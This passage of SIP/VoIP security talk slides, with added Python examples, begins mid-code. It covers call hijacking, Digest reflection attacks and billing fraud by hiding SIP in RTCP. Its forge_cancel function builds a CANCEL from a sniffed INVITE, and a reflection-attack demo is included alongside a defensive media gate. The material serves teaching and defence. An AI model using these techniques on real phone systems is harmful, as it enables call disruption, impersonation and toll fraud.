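        "codecs": [sdp["codecs"].get(pt, "pt" + pt) for pt in sdp.get("payload_types", [])],
        "key_in_clear": sdp["key"],
    }

def forge_cancel(raw):
    """Build the CANCEL that matches a sniffed INVITE: same Call-ID, To, From
    and CSeq number (with method CANCEL) and the same Via, as the slide's
    quoted rule requires. Everything needed is read off the wire."""
    msg = parse_sip(raw)
    h = msg["headers"]
    cseq_num = h["cseq"].split()[0]
    return ("CANCEL %s SIP/2.0\r\n" % msg["uri"]
            + "Via: %s\r\n" % h["via"]
            + "From: %s\r\n" % h["from"]
            + "To: %s\r\n" % h["to"]
            + "Call-ID: %s\r\n" % h["call-id"]
            + "CSeq: %s CANCEL\r\n" % cseq_num
            + "Content-Length: 0\r\n\r\n")
```

`call_record(SAMPLE_INVITE)` yields the caller and callee URIs, the Call-ID, `("100.101.102.103", 49172)` as the RTP endpoint and `PCMU/8000` as the codec, which is everything needed both to log the call and to pick the right decoder for the captured RTP; the 147-byte Content-Length check passes for the slide's message.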

SIP Security – Call Hijacking

An INVITE is sent; the attacker responds with a 3xy message indicating that the called party has moved, and gives his own forwarding address.

[Figure: A (SIP IP Phone) sends an INVITE towards B (SIP IP Phone); C (attacker) answers with "301 Moved Permanently" pointing at himself, and A sends a new INVITE' to C.]

SIP Security – Call Hijacking

Registering an address on behalf of another user. (If registration requires authentication, another type of attack might be used.)

[Figure: C (attacker) sends a REGISTER to the SIP Registrar saying "I am user A and here is my IP address", displacing A (SIP IP Phone).]

SIP Security – SIP Authentication


Two ways:
- UA to UA
- UA to Proxy/Registrar

Authentication mechanisms:
- Basic
- Digest
- PGP (not any more)

Digest is challenge-response based. Responses can also be authenticated, although this is not widely used.

SIP Security – SIP Authentication

When using Digest authentication one might use a reflection attack to gain unauthorized access to the network: the attacker, when challenged by a party, reflects that same challenge back to the party and uses the response it receives as its own.

A different secret needs to be used in each direction.
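As an added example (not from the deck), the Python below implements the Digest response computation SIP used at the time (RFC 2617 without qop), a UA that both issues and verifies challenges with a shared secret, and the reflection attack the slide mentions, run once with one symmetric secret and once with a separate secret per direction. It assumes a UA-to-UA deployment where both peers authenticate under one shared account ("a-b", a constructed name) and where the attacker can get the victim to answer a challenge carrying the same method and request-URI as the attacker's own request; the realm and secrets are constructed values.

```python
import hashlib
import os

def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()

def digest_response(username, realm, password, method, uri, nonce):
    """RFC 2617 Digest without qop: MD5(HA1 ":" nonce ":" HA2) where
    HA1 = MD5(user:realm:password) and HA2 = MD5(method:uri)."""
    ha1 = md5hex("%s:%s:%s" % (username, realm, password))
    ha2 = md5hex("%s:%s" % (method, uri))
    return md5hex("%s:%s:%s" % (ha1, nonce, ha2))

class UA:
    """A user agent that both challenges incoming requests and answers
    challenges for its own requests. With only secret_out given, the same
    secret is used in both directions (the weak configuration); giving a
    distinct secret_in is the slide's fix."""
    def __init__(self, username, realm, secret_out, secret_in=None):
        self.username, self.realm = username, realm
        self.secret_out = secret_out
        self.secret_in = secret_in if secret_in is not None else secret_out
        self.pending = set()          # nonces we issued and have not yet consumed

    def challenge(self):
        nonce = os.urandom(16).hex()
        self.pending.add(nonce)
        return nonce

    def answer(self, method, uri, nonce):
        """Answer a challenge received for one of our own requests."""
        return digest_response(self.username, self.realm, self.secret_out,
                               method, uri, nonce)

    def verify(self, method, uri, nonce, response):
        """Check a response to a challenge we issued; each nonce is single-use."""
        if nonce not in self.pending:
            return False
        self.pending.discard(nonce)
        expected = digest_response(self.username, self.realm, self.secret_in,
                                   method, uri, nonce)
        return response == expected

def reflection_attack(victim, method="INVITE", uri="sip:a@here.com"):
    """The attacker holds no secret at all.
    1. Attacker sends a request to the victim; the victim challenges it.
    2. Attacker reflects the victim's own nonce as a challenge to a request the
       victim sends the attacker (assumed to carry the same method and URI).
    3. The victim answers that challenge with its shared secret.
    4. Attacker replays the victim's answer to the victim's original challenge.
    Returns True if the victim accepts it."""
    nonce = victim.challenge()                    # step 1
    reflected = victim.answer(method, uri, nonce)  # steps 2 and 3
    return victim.verify(method, uri, nonce, reflected)   # step 4

def demo():
    """Same secret both ways versus a different secret per direction."""
    symmetric = UA("a-b", "here.com", "s3cret")
    directional = UA("a-b", "here.com", secret_out="key-a-to-b", secret_in="key-b-to-a")
    return reflection_attack(symmetric), reflection_attack(directional)
```

`demo()` returns `(True, False)`: the victim's own answer satisfies its own challenge when one secret serves both directions, and fails as soon as the secret used to answer differs from the one used to verify, which is exactly why the slide asks for a different secret in each direction.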

SIP Security – Encryption

- It is not a magic solution for everything.
- Signaling encryption is "designed" to hide information from eavesdroppers. But some information still cannot be hidden, since the proxies need it to route the request.
- The other end might be able to see all the routing information and send it back to the caller (G, here goes another bright idea to the toaster).

SIP Security – Encryption – Hide the Route Luke

[Figure: IP Phone A, four SIP Proxies in the signaling path, IP Phone B.]

Target – hide the routing information (Via headers).

Problem – IP Phone B will need to route back to IP Phone A. It will be able to see all the routing information before it sends responses to its local proxy.

SIP Security – Encryption

 It consumes time and introduces another delay. The problem will come when users are overcharged for calls because of the small delay it introduces.

 Law enforcement agencies will not permit this in a carrier, since they need to perform wiretapping, which is another criterion for being a carrier (the conversation will not be encrypted, at least in part of its traversal).

 ITSPs cannot encrypt – over delays.

SIP Security – Signaling & Media Transport

One of the functions of an H.323 gatekeeper is to provide authorization for each call to proceed. One of the authorization parameters is a parameter called allowed bandwidth, which dictates to the H.323 terminals the bandwidth the gatekeeper will allow them to use without sending a bandwidth request to the gatekeeper.

SIP uses the same codecs as H.323, since they both use RTP and RTCP. SIP is able to throttle the sending rate in order to deal with network congestion, but it does not have a provisioning function like H.323 has with its gatekeeper. Therefore SIP is not able to control the bandwidth used for the call. This also suggests that RTP and RTCP take more liberty with SIP based

SIP Security – Signaling & Media Transport

This means, for example, that with SIP not only can we make the line congested, we can also fake RTCP reports, or even switch to another bandwidth-consuming codec that will not fit the link between the two ends. Its usage will raise the packet loss, and we will get lower quality, or even poor quality, voice.

SIP is not aware of what happens at the Media Transport layer. This means that if we change the codec we are using through RTP, SIP will not be aware of this.

SIP Security – Fooling Billing

The SIP Proxy server is usually the one producing Call Detail Records (CDR) for billing. This is because the SIP Proxy server is able to force all the signaling an end point sends to go through the SIP Proxy server. This means that setup and tear-down signaling messages will go through the SIP Proxy server, so CDRs will be produced correctly.

In order to do so the signaling needs to go through the SIP Proxy. This is not true for the actual transport of the media. This means that there is no policing of the RTP/RTCP packets.

SIP Security – Fooling Billing

A simple way to fool this mechanism is to hide the SIP signaling in RTP or in RTCP messages. This of course requires that both ends of the communication use modified applications that understand how to parse the modified RTP/RTCP packets. One example of a modified RTCP packet might be one with a unique Packet Type field.

In this case the SIP Proxy will not see any signaling exchanged between the two ends of the communication, although audio will pass between both ends and a “call” will proceed. Of course no billing information will be available.

SIP Security – Fooling Billing

This example emphasizes the need to understand who comes first, the chicken or the egg. In our case signaling comes first; only then do we allow RTP packets to be exchanged. This is a restriction which needs to be put in any VoIP system based on the SIP protocol.

We can introduce this condition in a carrier VoIP based network as well. This will cause total chaos.
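The media-side checks the last three slides call for (the codec switched under SIP's nose, SIP hidden in RTCP with a private packet type, and "signaling first, then media"), as an added example that is not code from the original slides. It takes the negotiated port and payload types from the SDP of the Call Tracking example slide, builds RTP and RTCP packets per the RFC 3550 header layout, and runs a small gate over them the way a proxy-controlled firewall would. The SSRC, sequence numbers, the private RTCP packet type 250 and the hidden BYE are constructed; the gate assumes the classic RTCP-on-port+1 convention and that it knows whether an INVITE has been seen for the flow.

```python
"""Added example, not code from the original slides: a media gate that
checks RTP/RTCP against what SIP/SDP negotiated.  SDP is the one from the
Call Tracking example slide; packets, SSRC and the private RTCP packet
type 250 are constructed values."""
import struct

SDP = ("v=0\r\n"
       "o=UserA 2890844526 2890844526 IN IP4 here.com\r\n"
       "s=Session SDP\r\n"
       "c=IN IP4 100.101.102.103\r\n"
       "t=0 0\r\n"
       "m=audio 49172 RTP/AVP 0\r\n"
       "a=rtpmap:0 PCMU/8000\r\n")

STANDARD_RTCP_PT = {200: "SR", 201: "RR", 202: "SDES", 203: "BYE", 204: "APP"}
SIP_START = (b"INVITE ", b"ACK ", b"BYE ", b"CANCEL ", b"REGISTER ",
             b"OPTIONS ", b"SIP/2.0 ")


def negotiated_media(sdp):
    """Return (port, set of RTP payload types) from the first m=audio line."""
    for line in sdp.splitlines():
        if line.startswith("m=audio"):
            parts = line.split()
            return int(parts[1]), {int(p) for p in parts[3:]}
    raise ValueError("no m=audio line in SDP")


def rtp_header(pt, seq, ts, ssrc, marker=0):
    """RFC 3550 fixed RTP header: V=2, P=0, X=0, CC=0, then M|PT, seq, ts, SSRC."""
    return struct.pack("!BBHII", 0x80, (marker << 7) | (pt & 0x7F), seq, ts, ssrc)


def rtcp_packet(pt, ssrc, payload=b""):
    """RFC 3550 RTCP header: V=2, P=0, RC=0, PT, length in 32-bit words minus 1,
    followed by SSRC and a (padded) payload.  With a private PT and a SIP
    message as payload this is the 'unique Packet Type' trick from the slide."""
    body = struct.pack("!I", ssrc) + payload
    body += b"\x00" * ((-len(body)) % 4)
    length = len(body) // 4            # total words (incl. 4-byte header) - 1
    return struct.pack("!BBH", 0x80, pt, length) + body


def media_gate(dst_port, pkt, sdp, signaling_seen=True):
    """Decide whether one media packet is consistent with the signaled call.
    Returns a list of findings; an empty list means 'let it through'."""
    if not signaling_seen:
        # Chicken before egg: no INVITE for this flow, no media.
        return ["no signaling seen for this flow: media not allowed"]
    port, allowed = negotiated_media(sdp)
    if len(pkt) < 8 or pkt[0] >> 6 != 2:
        return ["not an RTP/RTCP version 2 packet"]
    if dst_port == port:                       # RTP
        pt = pkt[1] & 0x7F
        if pt not in allowed:
            return [f"RTP payload type {pt} not in SDP {sorted(allowed)}: "
                    "codec switched outside SIP"]
        return []
    if dst_port == port + 1:                   # RTCP
        findings = []
        if pkt[1] not in STANDARD_RTCP_PT:
            findings.append(f"RTCP packet type {pkt[1]} is not a standard report")
        payload = pkt[8:]
        if payload.startswith(SIP_START) or b"SIP/2.0" in payload:
            findings.append("SIP message carried inside RTCP: signaling bypassing the proxy")
        return findings
    return [f"port {dst_port} was not negotiated in the SDP"]


if __name__ == "__main__":
    ssrc = 0xDEADBEEF
    print(media_gate(49172, rtp_header(0, 1, 160, ssrc), SDP))
    print(media_gate(49172, rtp_header(10, 2, 320, ssrc), SDP))   # L16 stereo
    hidden = rtcp_packet(250, ssrc, b"BYE sip:UserB@there.com SIP/2.0\r\n")
    print(media_gate(49173, hidden, SDP))
```

Checking the payload type against the SDP catches the codec switch; checking the RTCP packet type and payload catches the cheap version of signaling-over-RTCP, and an attacker who wraps SIP in a standard-looking APP packet still shows up as RTCP that carries no report at all. Faked RTCP receiver reports are not something a gate like this can tell from real ones.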

SIP Security – Thoughts

This means that:

 No user should be able to get to another user (unless calling him).
 The default gateway needs to be your local SIP Proxy (or whoever it is in your solution).
 No service will be available unless someone is authenticating (but you do not expect people to authenticate before using the service…).

Therefore it is more than a simple headache…

SIP and Firewalls – Just to Illustrate the Problem

Today firewalls are not working that well with VoIP protocols.

Especially NAT introduces a lot of problems, since the IP addresses of source and destination might be in different parts of a message (not only in the IP header, but also in the Via and Contact headers and in the SDP c= line).

Signaling must control the opening of media stream “holes” in the firewall. If not, free phone calls might take place, a.k.a. SIP over RTCP/RTP or any other signaling over RTCP/RTP.

Who was first? The signaling or the media transport? The CANCEL or the INVITE? Etc.

SIP Security – Other Issues

 Intelligence at the end point (there is no such thing as “trusting the client” or “client security”).
 Predictable information – some of the field values are 100% predictable, except for the Call-ID. The Call-ID needs to be selected randomly, so that it cannot be anticipated either.
 Fraud – what about putting up our own neighborhood SIP Proxy?
 The path the signaling and media streams take.
 Supporting protocols and services:
 QoS – DiffServ is easy to forge. 802.1q might follow the same path.
 DNS
VoIP
The Next Generation of Phreaking

Questions?

Ofir Arkin
Managing Security Architect
